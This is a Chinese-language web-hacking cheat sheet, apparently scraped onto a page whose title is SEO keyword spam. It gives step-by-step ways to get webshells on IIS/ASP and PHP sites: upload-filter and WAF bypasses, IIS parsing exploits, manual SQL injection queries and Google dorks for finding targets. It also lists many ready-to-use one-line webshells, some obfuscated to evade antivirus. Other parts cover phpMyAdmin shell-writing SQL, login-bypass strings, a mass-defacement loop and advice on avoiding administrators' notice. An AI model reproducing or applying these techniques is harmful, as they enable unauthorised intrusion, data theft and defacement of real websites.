彩票销售网站开发,杨和网站建设,wordpress 首页顶部为空,什么网站是html5做的【 拿shell 】 1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马#xff0c;不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls 2.上传图片木马遇到拦截系统#xff0c;连图片木马都上传不了#xff0c;记事本打开图片木马在代码最前面加上gi… 【 拿shell 】 1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls 2.上传图片木马遇到拦截系统连图片木马都上传不了记事本打开图片木马在代码最前面加上gif89a一般就能逃过拦截系统了。 3.上传图片木马把地址复制到数据库备份里备份成asp木马有时不成功就利用IIs6.0解析漏洞尝试突破。 4.上传图片木马再用抓包工具进行抓包用明小子的综合上传功能复制上传地址及cookies填到对应的框里点击上传即可。 5.当后台有数据库备份蛋没有上传点时把一句话木马插到任意处再到数据库备份里备份成asp木马之后用一句话客户端连接木马即可。 6.后台点击修改密码新密码设置为1″:eval request(“h”)’设置成功后连接asp/config.asp即可拿下shell 7.当页面提示“上传格式不正确[重新上传]” 则说明存在上传漏洞复制地址放到明小子里上传一般都能直接拿下shell。 8.当后台没有数据库备份但有数据库恢复的情况下请不要犹豫数据库恢复跟数据库备份功能是一样的直接邪恶吧。 9.如果知道网站的数据库是asp的直接在前台找留言板插入一句话木马连接配置文件inc/config.asp即可拿下shell。 10.当网站前台有“会员注册” 注册一个账户进去看看有没有上传点有的话直接上传asp木马以及利用iis6.0解析漏洞不行就抓包用明小子上传。 11.先上传一个.ashx的文件在笔记里搜索可找到方法结果是访问会生成一句话木马文件后台上传、编辑器上传、上传漏洞页面均可使用此方法。 12.当页面提示只能上传jpg|gif|png等格式的时候右键查看源文件本地修改为asp|asa|php再本地上传即可拿下shell。 13.当用啊D检测注入点提示SA权限或DB权限的时候尝试列目录找到网站物理路径再点击cmd/上传直接上传asp木马即可不行就差异备份拿shell。 14.对于一些上传漏洞的上传页面以及后台找到的上传页面可以尝试用本地双文件上传突破第一个选jpg第二个选cer推荐使用火狐浏览器。 【 渗透技巧 】 1.某些cms的网站设置过滤不严直接在网站后面加上admin/session.asp 或 admin/left.asp 可以绕过后台验证直接进去后台。 2.提下服务器之后建议抓下管理员哈希值然后删除所有用户包括自己的以后登录这台服务器就用管理员的账号密码登录这样比较安全。 3.入侵网站之前连接下3389可以连接上的话先尝试弱口令不行就按5次shift键看看有没有shift后门。 4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里选择浏览器-拦截跳转勾选–查看即可直接进入后台。 5.突破防盗链系统访问shell代码javascript:document.write(“a href’ http://www.xxx.com/uploadfile/1.asp‘fuck/a”) 点击GO即可进入shell。 6.遇到一流信息监控拦截系统时上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。 7.eweb编辑器后台增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了尝试增加一个aaspsp再上传asp就会解析了。 8.用注入工具猜解到表段却猜解不到字段的时候到网站后台右键查看源文件一般账号密码后面的就是字段之后在注入工具里添加字段进行猜解即可。 9.当注入工具猜解表段但猜解字段时提示长度超过50之类不妨扔到穿山甲去猜解一下。 10.得知表段跟字段之后使用SQL语句在ACCESS数据库里加个用户名及密码的语句Insert into admin(user,pwd) values(‘jianmei’,daxia’) 11.当获得管理员密码却不知道管理员帐号时到网站前台找新闻链接一般“提交者”“发布者”的名字就是管理员的帐号了。 12.爆破ASPIIS架设的网站web绝对路径假设网站主页为 http://www.xxxxx/index.asp/ 提交 http://www.xxxxx.cn/fkbhvv.aspx/fkbhvv.aspx是不存在的。 13.有的站长很懒什么也不改当我们得知网站的cms的时候不妨去下载一套找找数据库路径以及敏感信息再尝试默认相关的可利用资源。 14.菜刀里点击一句话木马右键选择虚拟机终端执行命令出现乱码时返回去设置编码那里将默认的GB2312改为UTF-8. 15.入侵千万别忘了ftp试试诺口令ftp的默认端口21 默认帐号密码test 16.破解出md5为20位结果只需要把前三位和后一位去掉剩余16位拿去解密即可 17.好多网站的后台地址是admin_index.asp manage_login.asp 18.有时在木马代码里加上了gif89a上传成功访问的时候却出现了像图片一样的错误图像说明服务器把gif89a当做图片来处理了不要带gif89a即可。问就可以了。 19.找eweb编辑器的时候如果默认的被改了到前台去找图片右键看下路径根据图片的目录猜eweb编辑器的目录后台也是用此思路。 20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ 21.扫旁站的时候是不是想看每个站点是什么cms呢用轩辕剑扫描就可以显示系统特征。 22.网站的主站一般都很安全这时就要旁注或C段了但是想知道各个IP段开放了什么端口吗用“啊D网络工具包”里面的IP端口扫描最理想了。 23.手工检测注入点弹出“你的操作已被记录!”之类的信息访问这个文件sqlin.asp如果存在在注入点后面植入一句话木马‘excute(request(“TNT”)) 接着用一句话木马客户端连接 http://www.xxx.com/sqlin.asp上传木马即可拿下shell因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。 24.有的后台不显示验证码往注册表里添加一个ceg即可突破这个困境了把下面的代码保存为Code.reg双击导入就可以了。 REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] “BlockXBM”dword:00000000 25.内网渗透时尽量少登录3389以免被管理员发现 26.旁注的时候建议挑php的站点来日因为php站点一般都支持aspx脚本这样对于提权跟跨目录都轻松.! 【 手工注入 】 IE浏览器-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉否则不论服务器返回什么错误IE都只显示为HTTP 500服务器错误不能获得更多的信息。 手工注入时如果网站过滤了 and 11 and 12 可以用xor 11 xor 12 进行判断。 第一步找注入点 数字型 http://www.xxx.com/show.asp?id7 加’ 程序报错 加and 11 返回正常页面 加and 12 返回错误页面 字符型 http://www.xxx.com/show.asp?idade7 加’ 程序报错 加’and ’1′’1 返回正常页面 加’and ’1′’2 返回错误页面 新型检测注入点的方法 在URL地址后面加上-1若返回的页面和前面不同是另一个正常的页面则表示存在注入漏洞而且是数字型的注入漏洞。 在URL地址后面加上-0若返回的页面和之前的页面相同然后加上-1返回错误页面则也表示存在注入漏洞而且是数字型的。 如果报错提示这个 Microsoft JET Database Engine 错误 ’80040e14′ 语法错误 (操作符丢失) 在查询表达式 ‘ID 6 ord by’ 中。 /fun/Function.asp行 657 解明通过 JET 引擎连接数据库则是 Access数据库通过 ODBC 引擎连接数据库则是 MSSQL数据库。 第二步猜字段数 语句order by 5 如果猜6的时候返回出错就继续往回猜直到返回正确为止… 第三步UNION命令 语句and 12 union select 1,2,3,4,5– 看看哪里可以替换假如显示有2就在2这里替换SCHEMA_NAME见下 第三步猜库名 语句and 12 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1 第四步猜表段 语句and 12 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA0x68667A7338383838 limit 1,1 注意TABLE_SCHEMA后面的库名必须是hex转换过的格式倒数第二个1一直替换直到爆出所有表段然后选最可能性的那个。 第五步猜字段 and 12 union select 1,COLUMN_NAME,3,4,5 from information_schema.COLUMNS where TABLE_NAME0x615F61646D696E limit 1,1 注意TABLE_SCHEMA后面的表段必须是hex转换过的格式倒数第二个1一直替换直到爆出所有字段然后选最可能性的那两个。 第六步猜内容 语句一and 12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin 首先让程序报错所以在注入点后面加上 and 12 语句二 http://www.xxx.com/show.asp?id-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin 同样是先让程序报错在178这个参数前面加上 - 当列名帐号跟列名密码都猜解对的时候页面将会显示相对应的内容一般的密码都经过MD5加密了解密地址 http://www.cmd5.com/ ; UserName Password 【 常见网站程序 】 asp类 foosun(风讯) kesion(科汛) newasp(新云) 乔客 CreateLive(创力) 5uCMS KingCMS DvBBS(动网) BBSxp [博客]zblog [博客]pjblog PHP类 DeDeCms织梦 ECMS帝国 PHPCMS PHP168 HBcms宏博 SupeSite CMSware(思维) Joomla! [BBS]Discuz! [BBS]phpWind [SNS]UCenterHome [SNS]ThinkSNS [商城]EcShop [商城]ShopEx [博客]WordPress [维基]HDWiki [微博]PHPsay [DIGG]PBdigg ( php开源mysql绝对路径 ) 开源系统 数据库配置文件名 文件名所在的目录 Discuz! config.inc.php ./ config.inc.php Phpcms config.inc.php ./include/config.inc.php Wodpress wp-config.php ./ wp-config.php Phpwind sqlconfig.php ./data/sqlconfig.php phpweb config.inc.php ./config.inc.php Php168v6 mysql_config.php ./php168/ mysql_config.php Shopex config.php ./config/config.php Ecshop config.php ./data/config.php Joomla configuration.php ./ configuration.php UCenter config.inc.php ./data/config.inc.php EmpireCMS config.php ./e/class/config.php Dedecms common.inc.php .data/common.inc.php Zen Cart configure.php ./includes/configure.php Mediawiki localsettints.php ./config/localsettints.php Ecshop config.php ./data/config.php osCommerce configure.php ./includes/configure.php 【 谷歌黑客语法 】 site可以限制你搜索范围的域名. inurl用于搜索网页上包含的URL这个语法对寻找网页上的搜索帮助之类的很有用. intext: 只搜索网页body部分中包含的文字(也就是忽略了标题、URL等的文字) intitle: 查包含关键词的页面一般用于社工别人的webshell密码 filetype搜索文件的后缀或者扩展名 intitle限制你搜索的网页标题. link: 可以得到一个所有包含了某个指定URL的页面列表. 查找后台地址site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms 查找文本内容site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username 查找可注入点site:域名 inurl:aspx|jsp|php|asp 查找上传漏洞site:域名 inurl:file|load|editor|Files 找eweb编辑器site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit 存在的数据库site:域名 filetype:mdb|asp|# 查看脚本类型site:域名 filetype:asp/aspx/php/jsp 迂回策略入侵inurl:cms/data/templates/images/index/ 利用谷歌黑客快速找到自己想要的资料site:qiannao.com 提权视频 【 一句话木马 】 asp一句话木马%eval request(“x”)% php一句话木马?php eval($_POST[g]);? aspx一句话% Page Language”Jscript”%%eval(Request.Item[x],”unsafe”);% 数据库加密一句话(密码a)┼攠數畣整爠煥敵瑳∨≡┩愾 网站配置、版权信息专用一句话”%%Eval Request(x)% 一句话再过护卫神%Yrequest(“x”)% %execute(Y)% 过拦截一句话木马% eXEcGlOBaL ReQuEsT(“x”) % asp闭合型一句话 %%eval request(“0o1Znz1ow”)%% 能过安全狗的解析格式;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg 突破安全狗的一句话%Yrequest(“x”)% %eval(Y)% elong过安全狗的php一句话?php $a “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[cc]); ? 后台常用写入php一句话密码x ? $fp fopen(“c.php”, ‘a’); fwrite($fp, ‘’.?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”\r\n”); fclose($fp); ? 高强度php一句话 ?php substr(md5($_REQUEST[heroes]),28)’acd0′eval($_REQUEST[c]);? 新型变异PHP一句话(密码b4dboy): ($b4dboy $_POST[b4dboy]) preg_replace(‘/ad/e’,’’.str_rot13(‘riny’).’($b4dboy)’, ‘add’); 突破安全狗的aspx一句话 % Page Language”C#” ValidateRequest”false” % %try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[你的密码].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }% 突破护卫神保护盾一句话 ?php $a str_replace(x,”,”axsxxsxexrxxt”); $a($_POST[test]); ? 许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传这样一句话木马就写入不进数据库了。 改成〈scriptlanguageVBScript runatserver〉execute request(“l”)〈/Script〉 这样就避开了使用〈%%〉保存为.ASP,程序照样执行的效果是一样的。 PHP高强度一句话 ?php substr(md5($_REQUEST[x]),28)’acd0′eval($_REQUEST[c]);? 菜刀连接/x.php?xlostwolf 脚本类型php 密码c ?php assert($_REQUEST[c]);? 菜刀连接 躲避检测 密码c 【 解析漏洞总结 】 IIS 6.0 目录解析/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt)文本内容为后门代码 IIS6.0 会将 xx.jpg 解析为 asp 文件。 后缀解析/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名) IIS6.0 都会把此类后缀文件成功解析为 asp 文件。 默认解析/xx.asa /xx.cer /xx.cdx IIS6.0 默认的可执行文件除了 asp 还包含这三种 此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg IIS 7.0/IIS 7.5/Nginx 8.03 在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。 常用利用方法 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后避免破坏图片文件头和尾 e.g. copy xx.jpg/b yy.txt/a xy.jpg /b 即二进制[binary]模式 /a 即ascii模式 xx.jpg正常图片文件 yy.txt 内容 ?PHP fputs(fopen(‘shell.php’,w’),’?php eval($_POST[cmd])?’);? 意思为写入一个内容为 ?php eval($_POST[cmd])? 名称为shell.php的文件 找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址在地址后加上 /xx.php 即可执行恶意文本。 .然后就在图片目录下生成一句话木马 shell.php 密码 cmd 【 ewebeditor编辑器 】 默认后台ewebeditor/admin_login.asp 帐号密码admin admin 样式设计ewebeditor/admin_style.asp 查看版本ewebeditor/dialog/about.html 数据库路径db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!#ewebeditor.asp (用谷歌语法找文件名) 遍历目录ewebeditor/admin/upload.asp?id16amp;d_viewmodeamp;dir ../.. 跳转目录ewebeditor/admin_uoloadfile.aspid14dir.. (dir为列目录, ..为返回上层目录)形式:dir ../.. 点上传文件管理-随便选择一个样式目录得到ewindoweditor/admin_uoloadfile.asp?id14 在id14后面加dir../../../.. 就可看到整个网站的文件了(../自己加减) ( ewebeditor5.5版本 ) 默认后台ewebeditor/admin/login.asp 帐号密码admin 198625 数据库路径data/%23sze7xiaohu.mdb 遍历目录ewebeditor/admin/upload.asp?id16d_viewmodedir../ 调用样式上传页面ewebeditor/ewebeditor.htm?idbodystylepopup ( ewebeditor3.8 php版本 ) 默认后台eWebEditor/admin/login.php 首先随便输入一个帐号和密码接着系统会提示出错这时清空浏览器的url然后输入以下代码后连按三次回车键 javascript:alert(document.cookie”adminuser”escape(”admin”));javascript:alert(document.cookie”adminpass”escape(”admin”));javascript:alert(document.cookie”admindj”escape(”1”)); 接着访问文件ewebeditor/admin/default.php 就可以直接进入后台了。 ( ewebeditor编辑器exp手册 ) 有时候什么后缀都上传了还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试 一文件上传成功了但是访问不成功说明该目录(比如/UploadFile)被设置了权限返回去换成/ 上传到根目录就行了.增加asp等不行的时候可以利用解析asp;jpg 二下载数据库查看前人留下的痕迹再访问上传页面拿shell。 页面路径/ewebeditor.asp?id48stylepopu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目把S_ID跟S_Name的值替换在语句里访问上传相对应的格式木马。 【 fckeditor编辑器 】 查看版本fckeditor/editor/dialog/fck_about.html FCKeditor/_whatsnew.html 编辑器页面FCKeditor/_samples/default.html 上传页面fckeditor/editor/filemanager/connectors/test.html /editor/editor/fckeditor.html FCKeditor/editor/filemanager/connectors/aspx/connector.aspx FCKeditor/editor/filemanager/connectors/uploadtest.html 遍历目录FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?CommandGetFoldersAndFilesTypeFileCurrentFolder/ 编辑页面fckeditor/editor/filemanager/browser/default/browser.html?TypeImageConnectorconnectors/asp/connector.asp 查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?CommandGetFoldersAndFilesTypeImageCurrentFolder ( 拿shell方法总结 ) ASPX的站几乎都用fck编辑器建议用工具扫一下记住inc目录下可能存在fck编辑器扫下这个目录。 一如果是iis6.0上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell 二第一次上传1.asp;1.jpg被重命名为1_asp;1.jpg但是第二次上传1.asp;1.jpg就有可能变成1.asp;1(1).jpg 三iis7.5fck的解析文件为a.aspx.a;.a.aspx.jpg..jpg.aspx 四如果不是iis6.0 上传1.asp;jpg然后抓包接下来改包将分号变成空格再用c32把20改成00保存利用%00 截断分号两次 五成功访问别人的一句话木马页面 http://glavesoft.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg 但不知道密码 http://glavesoft.com/UploadFiles\EditorFile\file\2_asp;2.jpg 这个是图片木马没有成功利用iis6.0解析漏洞还是图片下载下来用记事本打开找到密码。 六IIS7.0/7.5 通杀oday把php一句话木马后缀改成1.jpg传上去找出一句话的路径后在1.jpg的后面添加/.php 例如 http://www.xxx.com/iges/php.jpg/.php ( 建立文件夹 . 变 _ 的突破方法 ) 利用Fiddler web debugger 这款工具来进行修改数据包从而达到突破的目的。 注意安装Fiddler web debugger需要安装.net环境以及.net的SP2补丁方可运行 1.打开fck的上传页面例如fckeditor/editor/filemanager/browser/default/connectors/test.html 2.再打开Fiddler web debugger这款工具点击设置–自动断点–选择 “请求之前” 3.接着打开fck的上传页面创建文件夹并输入你想要创建的文件名例如x.asp 4.然后返回到Fiddler web debugger这款工具里选择链接–点击右侧的嗅探 5.修改currentfolder内的参数改成你要建立的文件夹名字如x.asp 6.然后点击右侧的run to completion 7.再点击软件设置–自动断点–禁用再到浏览器里点击确定建立文件夹你就会发现文件夹建立为x.asp了 【 linux 】 解析格式1.php.xxx (xxx可以是任意) 如果apache不认识后缀为rar的文件我们就用1.php.rar格式上传文件就会被服务器当做PHP脚本解析。 辨别linux系统方法例如 http://www.xxx.com/xxx/abc.asp?id125 把b换成大写B访问如果出错了就说明是linux系统反之是windows系统. 【 旁注 】 旁注的技巧就是挑选支持aspx的站来日这样提权时候希望较大如何探测服务器上哪些站点支持aspx呢? 利用bing搜索 http://cn.bing.com/ 搜索格式ip:服务器ip aspx 比如要入侵一个网站想知道该网站支不支持aspx就在网站后面随便加上一个xxx.aspx回车如果显示的不是iis默认的错误页面而是这种“/”应用程序中的服务器错误说明支持aspx马。 【 phpmyadmin 】 查看版本test.php 或 phpinfo.php 默认账号密码root root 万能帐号密码’localhost’” 密码空 拿shell第一种方法 CREATE TABLE mysql.darkmoon (darkmoon1 TEXT NOT NULL ); INSERT INTO mysql.darkmoon (darkmoon1 ) VALUES (‘?php eval($_POST[pass]);?’); SELECT darkmoon1 FROM darkmoon INTO OUTFILE ‘d:/wamp/www/darkmoon.php’; DROP TABLE IF EXISTS darkmoon; 拿shell第二种方法Create TABLE moon (darkmoon text NOT NULL);Insert INTO moon (darkmoon) VALUES(‘?php eval($_POST[pass]);?’);select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;Drop TABLE IF EXISTS moon; 拿shell第三种方法select ‘?php eval($_POST[pass]);?’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’ 拿shell第四种方法select ‘?php echo \’pre\’;system($_GET[\cmd\]); echo \’/pre\’; ?’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’127.0.0.1/darkmoon4.php?cmdnet user 找到mysql数据库执行sql语句即可写入一句话再菜刀连接即可。 phpmyadmin脱裤在这里面是可以直接拖库的如同上传php拖库脚本一样操作差不多的。 修改mysql默认的root用户名方法: 进入phpmyadmin,进入mysql表,执行sql语句 1.update user set user’你的新root用户名’ where user’root’; 2.flush privileges; 例如 用root身份登入进入mysql库修改user表即可。 1.use mysql; 2. 3.mysqlupdate user set user’newName’ where user’root’; 4. 5.mysql flush privileges; 【 万能密码 】 ( php ) 帐号’ UNION Select 1,1,1 FROM admin Where ”’ 密码1 ( asp ) ‘xor ‘or’or’ ‘or””or”’ ‘or ’1′’1′or ’1′’1 ‘or 11/* 【 批量关键词 】 inurl:asp?id inurl:detail.php? CompHonorBig.asp?id 牛比 inurl:show.asp? 非常强大 site:www.yuming.com inurl:articleshow.asp?articleid数字 牛B inurl:szwyadmin/login.asp inurl:asp?id1 intitle:政府 杭州 inurl:Article_Class2.asp? 【 批量挂黑页 】 cmd命令执行 dir d:\wwwroot /b 1.txt 之后命令 for /f “tokens* delims ” %i in (d:\1.txt) do echo pauseD:\wwwroot\%i\wwwroot\1.txt 【 木马后门 】 1.TNTHK小组内部版 —— 存在关键词后门随便输入一个错的密码右键查看源文件找到错误关键词后面的font在font后面的就是正确密码。 2.不灭之魂—不死僵尸变种 —— 用这款工具专门爆这款大马的密码爆不灭之魂密码 3.终极防删免杀多功能VIP版本-无后门 —— 万能密码wbgz 菜刀连接kk 【 安全狗 】 1.过注入 方法一a.asp?aaa%00idsql语句 方法二 a.asp?idsql语句 里面把安全过滤的加个%l 比如 un%aion sel%aect 1,2,3,4 fr%aom admin 2.过大马被阻拦访问 方法一上传一个大马 然后访问 http://sss.com/dama.asp ; 访问后出现拦截。 那么解决方法 先将dama.asp改名dama.jpg上传然后在同目录上传个文件da.asp 内容为 !–#include file”dama.jpg” – 这样再访问da.asp 就不会被拦截了。 3.过菜刀连接一句话被拦截 方法一不用菜刀连接一句话用别的一句话连接端。 方法二中转下连接菜刀把过滤掉的词替换掉。 【 asp搜索框注入 】 在搜索框里我们输入一个关键词该关键词必须在这个站能搜索到信息。比如这个站我输入了1搜索到了很多新闻判断这个搜索框是否有注入漏动。 直接在前台的搜索框里注入被限制的话可以本地构造表单进行注入 html form name”form1″ method”post” action” http://www.xxx.com/search.asp“ 类型 label input name”t” type”text” id”t” value”1″ /label p 内容 label input name”key” type”text” id”key” /label /p p label input type”submit” name”Submit” value”提交” /label /p /form 1%’ ‘ and ‘%’ 系统报错 1%’ and 11 and ‘%’ 返回正确 1%’ and 12 and ‘%’ 返回错误 1%’ and (select count(*) from 表段) and ‘%’ 猜表段 1%’ and (select count(字段) from 表段) and ‘%’ 猜字段 1%’ and (select top 1 len(字段) from 表段)16 and ‘%’ 猜字段长度 1%’ and (select top 1 asc(mid(name,1,1)) from 表段)97 and ‘%’ 猜内容 用牛族字符转换器转换数字。猜长度的时候选择对的前面那个错的数字或是直接把大于号改为等于号看看正确就是了 有的网站存在搜索框利用这个搜索框进行注射从而爆出管理帐号密码%’ and 12 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’’ 我们在搜索框里搜索关键词1浏览器地址栏显示 http://www.XXXXXX.com/News_search.asp?key1otypemsg 这里的key1就是说我们搜索得关键词1我们要做的就是把key1放到最后面把连接变成 http://www.XXXXXX.com/News_search.asp?otypemsgkey1 或者直接把otypemsg删除变成 http://www.XXXXXX.com/News_search.asp?key1 【 本地构造上传漏洞 】 寻找程序上传漏洞必须从上传页面的源文件入手目标有两个 1.filename (文件名称) 在上传页面中针对文件扩展名过滤不严从而上传可执行的脚本木马。 2.filepath (文件路径) 在上传页面针对路径过滤不严导致可以修改上传相对路径上传脚本木马。 当检测到一个上传页面asp、asa后缀已经被过滤掉的时候可以尝试抓包明小子或NC上传 不行就利用本地上传漏洞构造上传例如上传页面是 http://www.baidu.com/upfile_other.asp 1.右键查看源文件找到这段代码form name”form1″ method”past” action”zwhua_upload1.asp” enctype”multipart/form-data” 把以上代码中actino处的路径补全即form name”form1″ method”past” action” http://www.xxx.com/zwhua_upload1.asp” enctype”multipart/form-data” 2.再找到这段代码input type”hidden” name”filepath” value”uploadfile/” 利用IIS6.0解析漏洞把以上代码中value处的文件补全即input type”hidden” name”filepath” value”uploadfile/1.asa; “ 注意冒号后面有空格 3.接着保存为1.html将刚保存的文件拖进去C32里选择十六进制模式找到“1.asa; ”后面的空格将其填充为00后保存退出 4.本地打开上传图片格式的木马(不成功时可以尝试上传一句话木马) 如果提示成功后不显示路径的话可以右键查看源文件自己手工找出路径访问即可 【 利用双文件上传拿shell 】 因为网站只判断一次如果第一个文件后缀是在白名单里面的话就让其上传并没有判断第二个文件所以上传任意格式的文件也让其通过。 当系统验证cookie的时候就要用到火狐浏览器了登录网站进后台让火狐浏览器保存管理员的cookie值再把修改后的“双文件上传工具”拖进去上传。 1.在后台找上传点右键查看源文件找到上传地址一般在post或action的附近搜索即可找到一般为src”../xxx.htm” 之后补全路径访问。 2.这个还不是真正的上传页面真正的上传页面后缀是asp的继续查看源代码找到action”xxx.asp”补全路径访问即可 4.其实也可以抓包从而获得上传路径抓包之后在Referer:这栏还有常见的是htto://www.xxxx.com/upfile_other.asp 3.打开双文件上传工具替换为当前的上传地址保存后拖进火狐浏览器里第一个选择jpg木马第二个选择cer木马提交后右键查看源文件找出路径即可。 【 数据库备份抓包改包NC提交拿shell 】 当备份路径不能修改,后缀又是mdb不变的时候我们可先对备份的过程进行抓包再本地构造用NC提交即可突破备份数据库恢复也可使用此方法 在抓包的时候最好用火狐浏览器因为有的浏览器抓不到包首先上传一张图片木马复制下地址接着对备份过程进行抓包把抓到的数据复制在文本里面 开始本地修改先把POST处补全网址找到最底下的一行数据再复制多一行对比长度进行修改把备份的数据名称替换为木马地址备份的名称改为自己想要的asp后缀 再将原来的数据长度跟现在的对比同时替换掉最后看一共增加了多少个字符就在Content-Length:处进行增减用NC提交数据格式nc 域名 801.txt 【 本地构造数据库备份突破拿shell 】 当上传jpg木马得到路径前去备份时发现数据库备功能用不了的情况下可以尝试本地构造突破拿shell 首先查看源文件找到“当前数据库路径”修改为刚上传jpg木马的路径再找到“数据库备份名称”修改为1.asa 找到“form method”past” action”Backup.asp?actionBackup”” 将路径补全“form method”past” action” http://xxx.com/admin/Backup.asp?actionBackup“” 最后保存为1.html有的网站不验证cookie的话直接打开进行备份就能成功了但是一般都需要验证cookie这时就用上火狐浏览器了。 因为火狐浏览器有保留cookie的功能先登录后台以管理员的权限进行上传直接把1.html拖进火狐浏览器里直接点击备份即可突破cookie验证 【 本地构造限制上传类型漏洞 】 一般用于直接扫到的上传页面名称是上传图片上传asp、asa等脚本时提示“请选择jpg或gif文件!” 这时通过这个方法一般都能成功首先保存到本地1.asp 放到小旋风的目录下然后找到以下这段代码 alert(“请点击浏览按钮选择您要上传的jpg或gif文件!”) myform.file1.focus; return (false); } else { str myform.file1.value; strsstr.toLowerCase(); lensstrs.length; extnamestrs.substring(lens-4,lens); if(extname!”.jpg” extname!”.gif”) { alert(“请选择jpg或gif文件!”); 看到这句代码if(extname!”.jpg” extname!”.gif”) 改为 if(extname!”.jpg” extname!”.gif” extname!”.asp”) 然后补充完整上传地址action这里然后网页打开127.0.0.1 直接上传asp文件就可以了。 【 抓包改包NC提交拿shell 】 1.抓包数据中如果存在name”filepath”或是name”filename”那么就可以满足NC的上传条件了。 2.将木马的抓包数据复制到文本文件中。例如1.txt 3.将路径补全 filepath截断法 uploadfile/路径后添加1.asp空格 (16进制下面将20改为00) filename自定义名称 C:\Documents and Settings\lei\桌面\1.jpg (将1.jpg 改为 1.asp空格16进制下将20改为00) 3.在Content-Length处加上../uploadfile/后增加的字节数。 4.用C32将空格的20改为00保存为1.txt。 5.把1.txt跟nc.exe放在同一目录下cmd命令nc -vv www.XXXX.com 801.txt ( 如果上传成功后没有将木马解析成asp可以尝试将文件名改成asa、cer、php 再不行就用IIS 6.0解析漏洞将文件名改为1.asa;1.jpg ) 【 抓包nc上传获取管理权限 】 这个方法相当于cookie欺骗首先到前台去注册一个会员注册成功后在登录的那一刻用抓包工具进行抓包把抓到的数据复制到1.txt里面。 接下来打开把双引号里棉的数据“X-Forwarded-For: 127.0.0.2′,group_id 1 where loginname ‘会员的帐号’#” 放在Content-Length的下面。 在看到最底下的loginname这行代码把最后面的验证码改成当前会员登陆的验证码然后将nc\1.txt 放在同一个目录下cmd命令nc 域名 801.txt 成功提交上去后刚才的会员帐户将变成管理员帐户了找到该站的后台地址登录即可实现cookie欺骗 【 cookie欺骗 】 当我们通过注入或是社工把管理员的帐号跟md5密码搞到手的时候却发现破解不出密码 (MD5是16位加密的) 那么我们就可以用COOKIE欺骗来绕过利用桂林老兵的cookie欺骗工具把自己的ID以及md5密码都修改成管理员的再修改cookie访问时就会实现欺骗了。 【 cookie中转突破防注入 】 有时检测一个网站系统会弹出一些SQL防注入的提示框这时我们可以利用COOKIE中转注入来进行突破首先准备一个webshell然后打开COOKIE中转工具。 复制注入点到“注入URL地址跟来源页”处把问号去掉再把问号后面的ID剪切到“注入键名”里再把ID后面那个参数剪切到“POST提交值”里替换jmdcw后面的参数。 点击生成再把生成的文件上传到webshell里然后访问路径再页面地址后面加“?jmdcw参数”这样搭建构造出来的注入点就绕过防注入了 以上是在webshell里搭建ASP坏境的方法下面的是本地架设ASP环境的方法 利用简易IIS服务器搭建一个环境再将COOKIE中转生成的文件放到简易IIS服务器的目录下然后运行简易IIS服务器在后面文件名问号jmdcw参数即可。 【 cookie手工突破防注入 】 第一种方法 用 and 11 and 12 检测网站是否存在注入点时如果提示你的IP已被记录就说明系统做了防注入措施可以用代码来突破。 管理员只过滤了and但是没有过滤or我们可以先猜网站的字段数 格式order by 数字 猜到错为止然后选前一个对的数字 比如猜到14错误那就是13了然后利用Cookie提交变量值代码javascript:alert(document.cookieid”escape(“这里填写变量值例如id408″)); 开始猜解表段代码javascript:alert(document.cookie”id”escape(“变量值 and 12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin”)); 复制在浏览器里打开将出现一个提示框点击确定就会注射进去再重新打开网站要在此处打开所以前面最好复制下网站地址 